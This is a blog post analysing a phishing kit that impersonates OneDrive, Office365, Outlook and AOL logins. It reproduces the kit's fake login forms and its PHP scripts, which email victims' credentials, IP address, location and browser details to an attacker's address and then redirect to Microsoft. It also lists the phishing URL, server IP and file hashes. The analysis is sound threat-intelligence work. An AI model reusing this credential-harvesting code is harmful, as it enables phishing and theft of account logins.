I started hunting and reporting phishing websites on Twitter: follow me here if you are interested! In this series of posts I am going to analyze and discuss some of the phishing kits found online.
Let’s start from the beginning
Here is my tweet containing some information about this instance of the kit:
#phishing #onedrive
— Andrea Palmieriπ€ (@andpalmier) May 22, 2020
hxxps://www.bonatura.com/ok.co/u/
exf: macdon161@gmail
reg: @GoDaddy
π @letsencrypt
β£οΈ 63.249.146.86 (AS54489)
π― @onedrive @Microsoft
@illegalFawn @ActorExpose @PhishKitTracker @Spam404 @malwrhunterteam @JAMESWT_MHT @ANeilan @sysgoblin @PhishStats pic.twitter.com/zbFwmBWEvm
We can clearly see from the second screenshot that the zip containing the phishing kit is left exposed, thus we can download it and check it on VirusTotal using the hash of the zip:
$ sha256sum u.zip
c9079c6f6576da99f979b637c358a45f89c7187ddb80edf9e7fb2d9500880173 u.zip
Explore the kit
When extracting the archive, we can see the following structure:
u
βββ aol.php
βββ css
βΒ Β βββ bootstrap.min.css
βΒ Β βββ style.css
βββ emailcode
βΒ Β βββ email.php
βββ images
βΒ Β βββ landing-devices-bg.jpg
βΒ Β βββ mail.png
βΒ Β βββ microbg.jpg
βΒ Β βββ microsoftlogo.png
βΒ Β βββ mobile-img.png
βΒ Β βββ officebg.jpg
βΒ Β βββ officelogo.png
βΒ Β βββ office.png
βΒ Β βββ Onedrive-logo.png
βΒ Β βββ outlook.png
βΒ Β βββ webmaillogo.png
βββ index.php
βββ js
βΒ Β βββ bootstrap.min.js
βββ microsoft.php
βββ office.php
βββ outlookcode
βΒ Β βββ email.php
βββ webmail.php
I usually start the analysis from the entrypoint: so, in this case, index.php. If we look at the div having the class loginform, we can find an interesting feature of this kit: it gives the user three options to login (Office365, Outlook and ‘other mail’).
Here is how it looks in the code and in the browser:
<div class="loginform">
<a href="office.php" class="loginoffice">Login with Office 365</a>
<a href="microsoft.php" class="loginoutlook">Login with Outlook</a>
<a href="webmail.php" class="loginmail">Login with Other Mail</a>
</div>
How this phishing kit looks like when deployed
Exfiltration method
The three PHP files referenced from index.php all include emailcode/email.php in the action of the form containing input fields for the credentials. Here is the form in one of them, specifically webmail.php:
<form name="webmail" methed="post" action="emailcode/email.php">
<div class="form-group orangeclr">
<label for="email">Email Address</label>
<div class="input-group mb-2 mr-sm-2 mb-sm-0">
<div class="input-group-addon" style="width: 2.6rem">
<i class="fa fa-at"></i>
</div>
<input type="text" name="email" class="form-control" id="email"
placeholder="[email protected]" required autofocus>
</div>
</div>
<div class="form-group orangeclr">
<label class="" for="password">Password</label>
<div class="input-group mb-2 mr-sm-2 mb-sm-0">
<div class="input-group-addon" style="width: 2.6rem">
<i class="fa fa-key"></i>
</div>
<input type="password" name="password" class="form-control"
id="password" placeholder="Password" required>
</div>
</div>
<div class="gostepbtn">
<input type="submit" name="submit_btn"
value="Go to step 2" class="gostep" />
</div>
</form>
After the victim enters the credentials, these are sent to emailcode/email.php with a POST. Let’s check what happens in there:
<?php
if(isset($_REQUEST['submit_btn'])){
$admin_email = "[email protected]";
$email = $_REQUEST['email'];
$password = $_REQUEST['password'];
$ip = getenv("REMOTE_ADDR");
$country = ip_visitor_country();
$region = ip_visitor_region();
$city = ip_visitor_city();
$adddate = date("D M d, Y g:i a");
$browser = $_SERVER['HTTP_USER_AGENT'];
admin_email contains the exfiltration email address for this instance of the phishing kit. So we can confirm that information is sent directly via email to the address specified in the variable.
As it is possible to see in the code above, the email sent includes multiple information: credentials, IP address, date and User-Agent string. The kit also tries to obtain the country, region and city where the request was generated by performing a request to geoplugin.net with curl_init and providing the IP address. However - as of now - the service has moved to geoplugin.com, thus these information cannot currently be collected by the kit.
<?php
// Always set content-type when sending HTML email
$formname = $_REQUEST['logintype'];
switch ($formname) {
case "office":
$message .= "Login Type Selection -- Office \n";
$subject = "Office login attempt -- ".$ip;
break;
case "outlook":
$message .= "Login Type Selection -- Outlook \n";
$subject = "Outlook login attempt -- ".$ip;
break;
case "webmail":
$message .= "Login Type Selection -- Webmail \n";
$subject = "Webmail login attempt -- ".$ip;
break;
default:
$message .= "Login Type Selection -- other \n";
$subject = "other login attempt -- ".$ip;
}
Using a switch, the kit detects which type of credentials were submitted by the phished user, and it changes the message and the subject of the email accordingly.
In the rest of the code the headers and body of the email are set, then the email is sent using mail(). After that, the user is redirected to a login page of Microsoft: https://login.microsoftonline.com/common/oauth2.
<?php
$from = 'Outlook <noreply>';
// To send HTML mail, the Content-type header must be set
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
// Create email headers
$headers .= 'From: '.$from."\r\n".
'Reply-To: '.$from."\r\n" .
'X-Mailer: PHP/' . phpversion();
$headers .= "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
// More headers
$headers .= "Reply-To: ". strip_tags($email) . "\r\n";
$message .= "Username/Email -- $email\n";
$message .= "Password -- $password\n";
$message .= "IP -- ".$ip."\n";
$message .= "Country Detected -- ".$country."\n";
$message .= "Region Detected -- ".$region."\n";
$message .= "City Detected -- ".$city."\n";
$message .= "Date -- ".$adddate."\n";
$message .= "Browser Detected -- ".$browser."\n";
//send email
@mail($admin_email,$subject,$message);
header('Location: https://login.microsoftonline.com/common/oauth2');
Other php files
At this point, the workflow of the kit seems clear, however there are two php files that seem unrelated with the rest of the kit, because they are never called or included: outlookcode/email.php and aol.php.
outlookcode/email.php
This file seems to have the same purpose of emailcode/email.php, but is less sophisticated, as it does not contain the switch case to handle multiple phishing pages. Here is the code:
<?php
if(isset($_REQUEST['submit_btn'])){
$admin_email = "[email protected]";
$email = $_REQUEST['email'];
$password = $_REQUEST['password'];
// $headers = "From:".$email;
// Always set content-type when sending HTML email
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
// More headers
$headers .= 'From:'.$email . "\r\n";
$subject = 'Recived data'.$email;
$headers = "From: " . strip_tags($email) . "\r\n";
$headers .= "Reply-To: ". strip_tags($email) . "\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
$message = '<html><body>';
$message .= '<p>Username: '.$email.'<p><br>';
$message .= '<p>Password: '.$password.'<p><br>';
$message .= '</body></html>';
//send email
if(mail($admin_email, $subject, $message, $headers )){
header('Location: https://login.microsoftonline.com/common/oauth2');
}
}
//if "email" variable is not filled out, display the form
Considering that the exfiltration email is included also here, I assume that this is just the code of an old version of the kit that was left in the zip by mistake… But who knows? π€·
aol.php
If we manually navigate to aol.php with our browser, we see the following:
Screenshot of aol.php
It seems another phishing page, this time for an app which has email capabilities.
Interacting with the page, we can notice that ‘Forgot Password?’, ‘Get a Free Username’ and ‘Erase Hard Drive Junk Now’ are not working, and the same applies to the ‘GET THE AOL APP’ button. In the source code, they all have the href attribute equal to javascript:void(0).
AOL apps for iPhone and Android
Here is the form:
<?php
require_once('emailcode/email.php')
?>
// SKIPPING NOT INTERESTING HTML
<form class="needs-validation" method="post" action="" novalidate>
<div class="form-group">
<input type="Email" class="form-control" id="validationCustom01"
placeholder="Email" required>
<div class="invalid-feedback">
Enter Email Address
</div>
</div>
<div class="form-group">
<input type="password" class="form-control" id="validationCustom02"
placeholder="Password" required>
<div class="invalid-feedback">
Enter Password
</div>
</div>
<a href="javascript:void(0);" class="forgotBtn">Forgot Password?</a>
<button class="btn stepBtn" type="submit">Go to step 2</button>
<div class="get-user">
<span><a href="javascript:void(0);">Get a Free Username</a></span>
<a href="javascript:void(0);">Erase Hard Drive Junk Now</a>
</div>
</form>
As for the other phishing pages of the kit, emailcode/email.php is imported also here. However, in this case, the action attribute of the form is empty; thus the php code will not be able to process the credentials of the victims.
The file is clear according to VirusTotal:
aol.php on VirusTotal
What about the other files?
We can check the VirusTotal detections of all the files using the sha256 hash:
$ find . -type f | xargs sha256sum
e7ed36ceee5450b4243bbc35188afabdfb4280c7c57597001de0ed167299b01b ./js/bootstrap.min.js
2777abe0312e6b49428d5d7f7f42e43af620793f86f823f2e045968afbdddb63 ./images/microbg.jpg
2ebc65a696544b8d69ade5f136250a9548d4badf1b9ad459e63ff68e7a985c69 ./images/mail.png
17f02fdb590800c9a21e2b6166f5f22cc54952d58897f09d8e82bb9195bc2071 ./images/outlook.png
089aa7fa65a4038b4ab9130d083e6bcc24b0e33f5018984ef1463b8516bc7993 ./images/microsoftlogo.png
e298d32d99708f56d68ef9cd0c44ec85910a4df7552b5b2041fcaa48d5ee9742 ./images/webmaillogo.png
efaccc2b190fcce0f0ab41064d882fb4a701c6aed6b1035595a16138e32a0a50 ./images/officelogo.png
6adc34b6d4d872e313e0857063eac568a489ab092ff0f15834a2559043c9c1e2 ./images/mobile-img.png
c86c4a6731077f1994a8caeccb1fc06477ea35a5b6abbb4abde1d06b8ef9ff32 ./images/landing-devices-bg.jpg
4603ea1b2f9df0c9d4f2a253c550ffbaf27ea2cb53ecde4277b2acf9dde33979 ./images/Onedrive-logo.png
1500514adf9e666a3d20530815df881bc94812c6906a53bd4c216d051d18c372 ./images/office.png
7a2c0b0e1e16041b12dd1a7d18438ceb14063c980799baee1d55cb2f04892777 ./images/officebg.jpg
84f1d1ffdc036768ffeba1be92362dcf619e7ce6ec27500ab47844ed24fc4230 ./index.php
0b09beb179bd176c93c443175940777332cf57ac9e4487ea9088ae21e3c6d032 ./microsoft.php
8979f584623e4307a42bd008d755c35456af8cb96bec89dd4fbec47036e20184 ./css/style.css
2c0f3dcfe93d7e380c290fe4ab838ed8cadff1596d62697f5444be460d1f876d ./css/bootstrap.min.css
c60bd69cdc08032d32898d4d3f7648a5370f15720b58b51af77a4ecd72799bc3 ./webmail.php
e5a35da055cf9b0cf6d4cfbd2d0e8be75ebdc56949740c5e767f12915e6174eb ./office.php
085f5dfb1f89bd983c58e618a95bf7bdaa872bee4a126495ec3e7cf421bb9fc2 ./aol.php
3234d6c03d185864d6537178a4d1e44c5277c9115f11b07f9c5be0517ebc51a7 ./emailcode/email.php
d6083dcb3385f93916f63b6e50d28791a51842d38bd507bcad7b731b7b33009d ./outlookcode/email.php
Here are the detections of index.php, microsoft.php, office.php and webmail.php on VirusTotal as of today.
index.php, microsoft.php, office.php and webmail.php on VirusTotal
No matches were found for emailcode/email.php and outlookcode/email.php. All the other files were flagged as ‘Undetected’ by all the engines on VirusTotal.
Conclusion
In this post, we analyzed u.zip, a phishing kit found online which tricks victims into giving their credentials using 3 templates: one for Office365, one for Outlook and one for other email services (with a cPanel theme).
Schema of the phishing kit
The templates redirect the credentials to emailcode/email.php, which tries to gather additional information and writes them into an email, that is sent to the exfiltration email address. At the end of the execution, the victim is redirected to login.microsoftonline.com.